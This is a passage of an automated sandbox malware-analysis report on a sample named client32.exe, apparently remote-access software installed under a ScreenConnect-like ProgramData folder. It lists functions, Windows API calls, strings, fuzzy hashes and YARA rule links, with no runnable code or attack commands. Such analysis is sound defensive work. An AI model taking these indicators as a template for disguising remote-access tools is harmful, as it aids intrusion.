Instruction ID: d3b849e2ad973fef578a9749f6757c176a70b87b907ef3891b0fe1cfb99cbb20
Opcode Fuzzy Hash: 778c6ba0e171d79eba0595c32230e2edbb25507cad38a6c54ee084687d80ca16
Instruction Fuzzy Hash: 1FF05872A00218AFC710CFA9D844E9777B8EB48720F00C91AF95A97A40D671E850DBA0

Function 6CC63B00 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6CC63B14
K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6CC67790,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6CC63B34
SetLastError.KERNEL32(00000078,00000000,?,6CC67790,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6CC63B3D

Strings

GetModuleFileNameExA, xrefs: 6CC63B0E

Memory Dump Source

Source File: 00000003.00000002.4454008542.000000006CC61000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC60000, based on PE: true

Associated: 00000003.00000002.4453991803.000000006CC60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454061749.000000006CCA7000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCA8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCAC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454111296.000000006CCAF000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc60000_client32.jbxd

Similarity

API ID: AddressErrorFileLastModuleNameProc
String ID: GetModuleFileNameExA
API String ID: 4084229558-758377266
Opcode ID: 73442d1cd6f3d35d061231bbf3bfc291826031998c30feccf7b8ee57566ba2f8
Instruction ID: 80f8d9e89fbea569b33af92304732e9b60e5df4da440e33d17acdfd905d74d52
Opcode Fuzzy Hash: 73442d1cd6f3d35d061231bbf3bfc291826031998c30feccf7b8ee57566ba2f8
Instruction Fuzzy Hash: 7CF05E72600628ABD720CFA4E944A5777B8EB48B11F004A1EF94597A40D671E8148BF1

Function 1106B810 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 134sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000000FA), ref: 1106B867
EnterCriticalSection.KERNEL32(?), ref: 1106B874
LeaveCriticalSection.KERNEL32(?), ref: 1106B946

Strings

Push, xrefs: 1106B836

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeaveSleep
String ID: Push
API String ID: 1566154052-4278761818
Opcode ID: c8e73f2153a96adabbe243cfa4b7c005f19ea282e9b9ca24df9cee0f30dd401a
Instruction ID: 4df47a80590d2ff1575c8e4611685a7654965963f85dd39abc8717f1393e9050
Opcode Fuzzy Hash: c8e73f2153a96adabbe243cfa4b7c005f19ea282e9b9ca24df9cee0f30dd401a
Instruction Fuzzy Hash: 0251BBB5E04B45DFE721CF64C884B86FBE9EF04314F068599D89A9B281E730ED44CBA0

Function 6CC68C00 Relevance: 6.1, APIs: 4, Instructions: 71sleepCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CCA9898,?,?,00000000,?,6CC6C0C1,?,00000000), ref: 6CC68C23
InterlockedExchange.KERNEL32(?,00000000), ref: 6CC68C88
Sleep.KERNEL32(00000000,?,6CC6C0C1,?,00000000), ref: 6CC68C9E
LeaveCriticalSection.KERNEL32(6CCA9898,00000000), ref: 6CC68CD0

Memory Dump Source

Source File: 00000003.00000002.4454008542.000000006CC61000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC60000, based on PE: true

Associated: 00000003.00000002.4453991803.000000006CC60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454061749.000000006CCA7000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCA8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCAC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454111296.000000006CCAF000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc60000_client32.jbxd

Similarity

API ID: CriticalSection$EnterExchangeInterlockedLeaveSleep
String ID:
API String ID: 4212191310-0
Opcode ID: b3eb279a462cdeb9d451caa817f33b6ba601ee73847c8a25621c7c2b84d40275
Instruction ID: 82abfe03a894fa5c9fd4ffa5b508ed25b8f6cd9a488fa3b135da79a700c44f88
Opcode Fuzzy Hash: b3eb279a462cdeb9d451caa817f33b6ba601ee73847c8a25621c7c2b84d40275
Instruction Fuzzy Hash: 0E216B72D02600BFDB209F5BD9C5A9AB3B8FB9331CF15051BD81583E40E332A881CB91

Function 00831020 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32 ref: 00831027
GetStartupInfoW.KERNEL32(?), ref: 00831084
GetModuleHandleW.KERNEL32(00000000,00000000,00000000,?), ref: 0083109F
ExitProcess.KERNEL32 ref: 008310AC

Memory Dump Source

Source File: 00000003.00000002.4452493429.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true

Associated: 00000003.00000002.4452478480.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4452509174.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_830000_client32.jbxd

Yara matches

Similarity

API ID: CommandExitHandleInfoLineModuleProcessStartup
String ID:
API String ID: 2164999147-0
Opcode ID: 769cd989a320fb9abb75a8d689f5ce5517c3814eb53f096aff2c22ebda8d554a
Instruction ID: c8b765a2d0ee65c2e6ea3831ab5ab64abcf4114d3c1b892f402645197800b49b
Opcode Fuzzy Hash: 769cd989a320fb9abb75a8d689f5ce5517c3814eb53f096aff2c22ebda8d554a
Instruction Fuzzy Hash: 9A11AD64C00BA596DF386BA4882D37A76F8FF90B91F508819ECC6E2181E7649CC1C2E5

Function 110091F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 11009265
_memmove.LIBCMT ref: 110092B6

Part of subcall function 11008D50: std::_Xinvalid_argument.LIBCPMT ref: 11008D6A

Strings

string too long, xrefs: 11009260

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: 9dfb108bb060dbe814511fcf92a59b01b61276c30512c891ce2dcd2ce0dbaaee
Instruction ID: 3a6cd60558af0b1eb5e54a62a16ab8d1ec8c1d39fd4bf56391ab3766311947f4
Opcode Fuzzy Hash: 9dfb108bb060dbe814511fcf92a59b01b61276c30512c891ce2dcd2ce0dbaaee
Instruction Fuzzy Hash: 2031F832B04A105BF320DE9CE88099AF7EDEBE57A4B200A1FE589C7640E7719C4087A0

Function 11133070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(11027FDF,?,111332C3,?), ref: 1113307C
GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\MScreenConnect\client32.exe,00000104,?,111332C3,?), ref: 11133099

Strings

C:\ProgramData\MScreenConnect\client32.exe, xrefs: 11133084, 11133092

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CurrentFileModuleNameProcess
String ID: C:\ProgramData\MScreenConnect\client32.exe
API String ID: 2251294070-1801647770
Opcode ID: a6c8bb78b7cff768986e440d02e8fb9d9739dc476a51eb8ebc485fd1644a9421
Instruction ID: 95a860fb11ce3698bf83e103d73d4dee3427247e4625c7d7c027b33986acbc52
Opcode Fuzzy Hash: a6c8bb78b7cff768986e440d02e8fb9d9739dc476a51eb8ebc485fd1644a9421
Instruction Fuzzy Hash: D511E3317352529FEB049F65CB88B69FBE8AB8032AF10483CE819C73C9DB71E4418754

Function 6CC760A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6CC76104

Strings

httputil.c, xrefs: 6CC760E7
hbuf->data, xrefs: 6CC760EC

Memory Dump Source

Source File: 00000003.00000002.4454008542.000000006CC61000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC60000, based on PE: true

Associated: 00000003.00000002.4453991803.000000006CC60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454061749.000000006CCA7000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCA8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCAC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454111296.000000006CCAF000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc60000_client32.jbxd

Similarity

API ID: _memmove
String ID: hbuf->data$httputil.c
API String ID: 4104443479-2732665889
Opcode ID: ed4318a2cba42164429e7db891b4b7cb4c3f56877cb4fe642417cad6ecb4d937
Instruction ID: 8fc2042b62758d6d4c824a4c5fe697aaa651316c4d00c04d31cf359a6601d38e
Opcode Fuzzy Hash: ed4318a2cba42164429e7db891b4b7cb4c3f56877cb4fe642417cad6ecb4d937
Instruction Fuzzy Hash: DF01D6B5A006016FC720CE59DC84E96B3E9EB84368B04C92DF949C7B05FA31EC454760

Function 111028F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 111028F9

Part of subcall function 111515D1: __FF_MSGBANNER.LIBCMT ref: 111515EA
Part of subcall function 111515D1: __NMSG_WRITE.LIBCMT ref: 111515F1
Part of subcall function 111515D1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 11151616

_memset.LIBCMT ref: 11102922

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

..\ctl32\Refcount.cpp, xrefs: 1110290C

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
String ID: ..\ctl32\Refcount.cpp
API String ID: 2803934178-2363596943
Opcode ID: 8ceac53d4b882e3ad77e31f6125f7b94b4e5b9218588710275c61263be325fed
Instruction ID: 7b3fe2d044e72b669e117e25c325990e8ae2f19ed3d346f33a4fc8cf1dac6abc
Opcode Fuzzy Hash: 8ceac53d4b882e3ad77e31f6125f7b94b4e5b9218588710275c61263be325fed
Instruction Fuzzy Hash: C4E0C22AE4052533C06211C77D01FDBFB9C4F92EBDF040031FD0866252F581B64281E2

Function 11008080 Relevance: 4.6, APIs: 3, Instructions: 113COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 11008119

Part of subcall function 11150C1A: std::exception::_Copy_str.LIBCMT ref: 11150C35

__CxxThrowException@8.LIBCMT ref: 1100812E

Part of subcall function 11151071: RaiseException.KERNEL32(?,?,11103644,?,?,?,?,?,11103644,?,111B83A0), ref: 111510B3

Part of subcall function 11006120: std::exception::exception.LIBCMT ref: 1100614F
Part of subcall function 11006120: __CxxThrowException@8.LIBCMT ref: 11006164

_memmove.LIBCMT ref: 11008175

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaise_memmovestd::exception::_
String ID:
API String ID: 163498487-0
Opcode ID: ddf3934b7e3cc49579073e560e2d5ed7b9558a3e39290067fe631d753cd70594
Instruction ID: 751204694d98789b940d07f955dd3750b694ff523ecff2ffc9d33db490a76fe1
Opcode Fuzzy Hash: ddf3934b7e3cc49579073e560e2d5ed7b9558a3e39290067fe631d753cd70594
Instruction Fuzzy Hash: F641A775E04606AFD744CF68C8806DEFBF8FF052A4F50466AE81697381D771AA40CBE1

Function 11109520 Relevance: 4.6, APIs: 3, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000), ref: 11109571
RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 111095AE
RegCloseKey.ADVAPI32(00000000), ref: 111095B5

Part of subcall function 11132450: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110291B,75A78400,?,?,1113451F,00000000,CSDVersion,00000000,00000000,?), ref: 11132470

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseValue$Query
String ID:
API String ID: 392431914-0
Opcode ID: d01179d7914921633af1f95ba34bf02261fa1053a5ce10add05aa5ad212a0479
Instruction ID: b6a822484d63e5f43720bc89d1637945e72db1cf2086c07164aebed0ca827549
Opcode Fuzzy Hash: d01179d7914921633af1f95ba34bf02261fa1053a5ce10add05aa5ad212a0479
Instruction Fuzzy Hash: 8011DD7A600219BBD701CE48DC45FEB77A9AFC4729F00C119FE198A186E371A60687B5

Function 11104920 Relevance: 4.5, APIs: 3, Instructions: 49COMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1110494A
__wsplitpath.LIBCMT ref: 11104965

Part of subcall function 11157A24: __splitpath_helper.LIBCMT ref: 11157A66

GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 11104999

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
String ID:
API String ID: 1847508633-0
Opcode ID: e00128b51e07567abddb4f5e022b8e4f6c55213232340030c4bfcc7508d070b3
Instruction ID: 41b85f1024430b5e478ef76c55f3555d5bba1c79e506978d3f2aac1c004cd1db
Opcode Fuzzy Hash: e00128b51e07567abddb4f5e022b8e4f6c55213232340030c4bfcc7508d070b3
Instruction Fuzzy Hash: 9D116175A40208ABDB15CB94CC42FEDF374AF49B04F5041D8EA246B1C0E7B02A48CB65

Function 11096D20 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110EC9C4,00000030,11130C07,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 11096D41
OpenProcessToken.ADVAPI32(00000000,?,?,110EC9C4,00000030,11130C07,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 11096D48

Part of subcall function 11096C50: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,00000001,?,00000000), ref: 11096C88
Part of subcall function 11096C50: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 11096CA4
Part of subcall function 11096C50: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00AFC318,00AFC318,00AFC318,00AFC318,00AFC318,00AFC318,00AFC318,111DA704,?,00000001,00000001), ref: 11096CD0
Part of subcall function 11096C50: EqualSid.ADVAPI32(?,00AFC318,?,00000001,00000001), ref: 11096CE3

CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 11096D67

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
String ID:
API String ID: 2256153495-0
Opcode ID: db81ee2fe5c491a2ccb29379fd95f1d0d1d742c7a3d4049ea7660b541be06c1b
Instruction ID: bef03fc96a11baf82ef458017e705a3ff4e764ad3467957e138692709f696853
Opcode Fuzzy Hash: db81ee2fe5c491a2ccb29379fd95f1d0d1d742c7a3d4049ea7660b541be06c1b
Instruction Fuzzy Hash: 6FF082B6E02218AFCB04DFB4ECC899EF7B8EB092087508079F82AC3205E635D900DF54

Function 11102C20 Relevance: 3.8, APIs: 3, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(111DC098,2F623E72,?,?,?,?,-00000001,1116FF88,000000FF,?,11102CF8,00000001,?,11158063,?), ref: 11102C54
EnterCriticalSection.KERNEL32(111DC098,2F623E72,?,?,?,?,-00000001,1116FF88,000000FF,?,11102CF8,00000001,?,11158063,?), ref: 11102C70
LeaveCriticalSection.KERNEL32(111DC098,?,?,?,?,-00000001,1116FF88,000000FF,?,11102CF8,00000001,?,11158063,?), ref: 11102CB8

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterInitializeLeave
String ID:
API String ID: 3991485460-0
Opcode ID: 21aed678011e1edbc94f63bc384b6260687119dd637fa6182ef04eff418a5b30
Instruction ID: af8f5faaa0e43fc37bf2fbcfa483d918300548e7e4694db782cc55eb6f48ea86
Opcode Fuzzy Hash: 21aed678011e1edbc94f63bc384b6260687119dd637fa6182ef04eff418a5b30
Instruction Fuzzy Hash: 5C11C679A05314AFDB108F95CA88BDEF7A8FB46618F40472DEC12A3340DB75580087A1

Function 11064150 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,00000000), ref: 11064212

Strings

??CTL32.DLL, xrefs: 110641D3

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

